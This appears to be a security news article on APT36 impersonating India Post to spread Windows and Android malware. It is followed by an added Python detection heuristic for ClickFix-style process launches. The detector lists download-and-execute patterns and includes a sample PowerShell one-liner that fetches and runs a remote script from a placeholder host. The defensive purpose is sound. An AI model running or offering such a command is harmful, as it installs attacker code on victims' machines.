
APT36 Impersonates India Post to Deliver Malware to Windows and Android Users

APT36 Targets Indian Users with Fake India Post Website 

A Pakistan-linked advanced persistent threat group known as APT36 or Transparent Tribe has been identified as the actor behind a fraudulent website impersonating India’s public postal system. The cyber campaign aims to infect both Windows and Android users in India with malware, according to cybersecurity firm CYFIRMA. 

The fake website, postindia site, is designed to deceive visitors based on their device type. Windows users are prompted to download a malicious PDF, while Android users are served a compromised application package named indiapost apk.

Malware Delivery on Windows 

When accessed from a desktop, the site delivers a PDF file containing a ClickFix-based attack. The document instructs users to press Win and R, paste a PowerShell command, and execute it. This action downloads a next-stage payload from a remote server, which is currently inactive. 

An analysis of the metadata of the dropped PDF file reveals that it was created on October 23rd 2024 by an author named PMYLS, possibly referencing Pakistan’s Prime Minister Youth Laptop Scheme. The fake domain was later registered in November 2024.

Android Malware and Data Theft 

When accessed from an Android device, the website encourages users to install an official mobile app for a better experience. Once installed, the malicious app requests extensive permissions, enabling it to harvest contact lists, track the user’s location, and access and exfiltrate files from external storage. 

To evade detection, the app changes its icon to mimic a Google Accounts icon, making it difficult to locate and uninstall. Additionally, if a user denies permissions, the app forces them to accept. 

The malware is also designed to run persistently in the background even after a device restart and bypass battery optimization settings to remain active at all times. 

Growing Use of ClickFix Attacks 

The ClickFix technique, which tricks users into manually executing malicious commands, is gaining popularity among cybercriminals and advanced persistent threat groups. CYFIRMA warns that this evolving tactic poses a significant risk as it can deceive both non-technical and tech-savvy users who may not recognize it as a cyber threat.
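As an added defender-side illustration that is not part of CYFIRMA's report or this article, the following Python heuristic flags process-creation records matching the ClickFix pattern described above: a scripting host spawned from the Run dialog (parent explorer.exe) with a command line that fetches and executes a remote payload. The log records, field names, paths and URL are constructed for the example.

```python
import re
from dataclasses import dataclass

@dataclass
class ProcessEvent:
    """Minimal stand-in for a Sysmon Event ID 1 / EDR process-creation record (constructed)."""
    parent_image: str
    image: str
    command_line: str

# Primitives a pasted one-liner needs in order to fetch and run a next stage.
DOWNLOAD_PATTERNS = [
    r"invoke-webrequest", r"\biwr\b", r"\bcurl\b", r"\bwget\b",
    r"downloadstring", r"downloadfile", r"start-bitstransfer",
    r"invoke-expression", r"\biex\b", r"msiexec.*\s/i\s+https?://",
]
# Window/policy switches: weak evidence alone, telling in combination (matched on lowercased text).
EVASION_PATTERNS = [
    r"-w(indowstyle)?\s+hidden", r"-nop\b", r"-noprofile\b",
    r"-e(p|xecutionpolicy)\s+bypass", r"-e(nc|ncodedcommand)?\s+[a-z0-9+/=]{20,}",
]
SHELLS = ("powershell.exe", "pwsh.exe", "cmd.exe", "mshta.exe")

def _hits(patterns, text):
    return [p for p in patterns if re.search(p, text)]

def score_event(ev: ProcessEvent, threshold: int = 4):
    """Return (flagged, reasons); the score is a triage heuristic, not a verdict."""
    cmd = ev.command_line.lower()
    score, reasons = 0, []
    # Win+R commands are spawned by the shell process, so explorer.exe as the parent
    # of a scripting host is the Run-dialog signature this technique relies on.
    if ev.parent_image.lower().endswith("explorer.exe") and ev.image.lower().endswith(SHELLS):
        score += 2
        reasons.append("scripting host launched from explorer.exe (Run dialog)")
    dl, sw = _hits(DOWNLOAD_PATTERNS, cmd), _hits(EVASION_PATTERNS, cmd)
    score += 2 * len(dl) + len(sw)
    reasons += [f"download/exec primitive: {p}" for p in dl] + [f"evasion switch: {p}" for p in sw]
    if re.search(r"https?://", cmd):
        score += 1
        reasons.append("remote URL in command line")
    return score >= threshold, reasons

def triage(events):
    """Indices of events that cross the threshold."""
    return [i for i, ev in enumerate(events) if score_event(ev)[0]]

# Constructed telemetry: one ClickFix-style paste, one scheduled admin script, one plain shell launch.
SAMPLE_EVENTS = [
    ProcessEvent(r"C:\Windows\explorer.exe", r"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe",
                 'powershell -w hidden -nop -c "iwr http://example.invalid/stage2.ps1 | iex"'),
    ProcessEvent(r"C:\Windows\System32\svchost.exe", r"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe",
                 r"powershell.exe -ExecutionPolicy Bypass -File C:\scripts\backup.ps1"),
    ProcessEvent(r"C:\Windows\explorer.exe", r"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe",
                 "powershell.exe"),
]
```

Only the first record crosses the threshold; the scheduled script and the bare interactive shell each score too low to alert, which keeps the rule usable on real endpoint telemetry.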

Organizations and individuals are advised to stay vigilant, avoid downloading unknown files, and scrutinize app permissions before installation. 
